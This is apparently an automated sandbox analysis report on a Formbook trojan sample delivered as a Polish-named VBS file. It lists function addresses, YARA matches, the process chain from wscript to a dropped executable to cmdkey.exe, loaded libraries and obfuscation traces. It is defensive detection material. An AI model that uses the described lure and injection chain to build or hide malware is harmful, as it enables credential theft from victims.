Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D4AD00
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3E3D5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3E88C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3E4F3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3D8F8
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03841380
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0385E310
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0390F330
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0383D2EC
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0390124C
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038551C0
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0386B1E0
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0383F113
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0391010E
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038ED130
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0389717A
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038400A0
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0385B0D0
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_039070F1
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038FE076
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03906757
Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03852760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0385A7605_2_0385A760
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038506805_2_03850680
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390A6C05_2_0390A6C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C36EC5_2_038C36EC
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0384C6E05_2_0384C6E0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390F6F65_2_0390F6F6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386C6005_2_0386C600
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038ED62C5_2_038ED62C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038FD6465_2_038FD646
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038746705_2_03874670
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039075C65_2_039075C6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390F5C95_2_0390F5C9
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0391A5265_2_0391A526
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038504455_2_03850445
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C4BC05_2_038C4BC0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03850B105_2_03850B10
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390FB2E5_2_0390FB2E
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390FA895_2_0390FA89
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386FAA05_2_0386FAA0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390CA135_2_0390CA13
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390EA5B5_2_0390EA5B
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0384E9A05_2_0384E9A0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390E9A65_2_0390E9A6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038668825_2_03866882
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038C98B25_2_038C98B2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038528C05_2_038528C0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039018DA5_2_039018DA
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_039078F35_2_039078F3
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038538005_2_03853800
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F08355_2_038F0835
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390F8725_2_0390F872
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038368685_2_03836868
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038598705_2_03859870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386B8705_2_0386B870
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390EFBF5_2_0390EFBF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03901FC65_2_03901FC6
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03856FE05_2_03856FE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0385CF005_2_0385CF00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390FF635_2_0390FF63
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03851EB25_2_03851EB2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03900EAD5_2_03900EAD
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03909ED25_2_03909ED2
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03842EE85_2_03842EE8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03870E505_2_03870E50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038F0E6D5_2_038F0E6D
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03862DB05_2_03862DB0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03859DD05_2_03859DD0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038EFDF45_2_038EFDF4
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0384AD005_2_0384AD00
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390FD275_2_0390FD27
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03907D4C5_2_03907D4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03850D695_2_03850D69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038E9C985_2_038E9C98
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03868CDF5_2_03868CDF
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0386FCE05_2_0386FCE0
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0391ACEB5_2_0391ACEB
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03840C125_2_03840C12
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0385AC205_2_0385AC20
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_038FEC4C5_2_038FEC4C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03853C605_2_03853C60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0390EC605_2_0390EC60
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_03906C695_2_03906C69
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371F0AD5_2_0371F0AD
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371E3D55_2_0371E3D5
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371D8F85_2_0371D8F8
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371E88C5_2_0371E88C
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0371E4F35_2_0371E4F3
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 03897BE4 appears 88 times
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 038CEF10 appears 102 times
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 0383B910 appears 266 times
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 038BE692 appears 84 times
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 03885050 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: String function: 32D85050 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: String function: 32DCEF10 appears 99 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: String function: 32D3B910 appears 265 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: String function: 32DBE692 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: String function: 32D97BE4 appears 84 times
        Source: Zeskanowana lista przedmiot#U00f3w nr 84329.vbs | Initial sample: Strings found which are bigger than 50
        Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: wscript.exe, 00000000.00000003.19732112682.000002156FD5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733444126.000002156FDAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19745616939.000002156FDAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19732614950.000002156FD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733082746.000002156FD81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *...GjhADa0...sLn1;;;Op5
        Source: wscript.exe, 00000000.00000003.19724635083.000002156FF32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19702139822.000002157046A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19726805382.000002156FF48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19702730929.0000021570487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19726031346.000002156FF47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19697552235.000002157042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19720152791.000002156FE96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19721127089.000002156FEB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19727190383.000002156FF4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19723537096.000002156FEE6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19722569290.000002156FED6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <Da0...sLn1;;;O))in2+GzOm+vhiDP
        Source: wscript.exe, 00000000.00000003.19743881979.0000021570466000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19743308554.0000021570465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19734485655.0000021570423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19734829954.0000021570435000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19738699805.0000021570460000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19735744514.0000021570454000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *...GjhADa0...sLn1;;;OmG
        Source: classification engine | Classification label: mal100.troj.evad.winVBS@7/11@1/1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_00404060 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_0040234F CoCreateInstance
        Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe
        Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs"
        Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: oleacc.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\explorer.exe | Section loaded: fhcfg.dll
        Source: C:\Windows\explorer.exe | Section loaded: efsutil.dll
        Source: C:\Windows\explorer.exe | Section loaded: mpr.dll
        Source: C:\Windows\explorer.exe | Section loaded: dsrole.dll
        Source: C:\Windows\explorer.exe | Section loaded: windows.internal.system.userprofile.dll
        Source: C:\Windows\explorer.exe | Section loaded: cloudexperiencehostbroker.dll
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: Zeskanowana lista przedmiot#U00f3w nr 84329.vbs | Static file information: File size 1306825 > 1048576
        Source: Binary string: wntdll.pdb source: temp_executable.exe, cmdkey.exe

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");
        Source: Yara match | File source: 00000003.00000002.20209174867.0000000001876000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.19989077508.00000000032B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 2_2_6FC32351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32D408CD push ecx; mov dword ptr [esp], ecx 3_2_32D408D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A36AE9 pushad ; retf 3_2_32A36B10
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3562C push ss; retf 3_2_32A35636
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3CE73 push ebp; iretd 3_2_32A3CE78
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A36245 push ecx; iretd 3_2_32A3627D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A35BE8 push ss; iretd 3_2_32A35CB1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3FF58 push edi; iretd 3_2_32A3FF66
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A35C8E push ss; iretd 3_2_32A35CB1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A35C32 push ss; iretd 3_2_32A35CB1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A36438 push ebp; retf 3_2_32A3643B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A401A7 push esi; ret 3_2_32A401A8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A37585 push sp; ret 3_2_32A37589
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A361F9 push ecx; iretd 3_2_32A3627D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3CDF8 push ebp; iretd 3_2_32A3CE78
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 3_2_32A3CD75 push FFFFFFA0h; retf 3_2_32A3CDEA
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_038408CD push ecx; mov dword ptr [esp], ecx 5_2_038408D6
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03715BE8 push ss; iretd 5_2_03715CB1
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03725272 push eax; ret 5_2_03725274
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03716245 push ecx; iretd 5_2_0371627D
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03716AE9 pushad ; retf 5_2_03716B10
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_037161F9 push ecx; iretd 5_2_0371627D
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_037201A7 push esi; ret 5_2_037201A8
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0371FF58 push edi; iretd 5_2_0371FF66
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0371CE73 push ebp; iretd 5_2_0371CE78
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0371562C push ss; retf 5_2_03715636
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0371CD75 push FFFFFFA0h; retf 5_2_0371CDEA
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0371CDF8 push ebp; iretd 5_2_0371CE78
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03717585 push sp; ret 5_2_03717589
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03715C32 push ss; iretd 5_2_03715CB1
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03716438 push ebp; retf 5_2_0371643B
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_03715C8E push ss; iretd 5_2_03715CB1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | File created: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
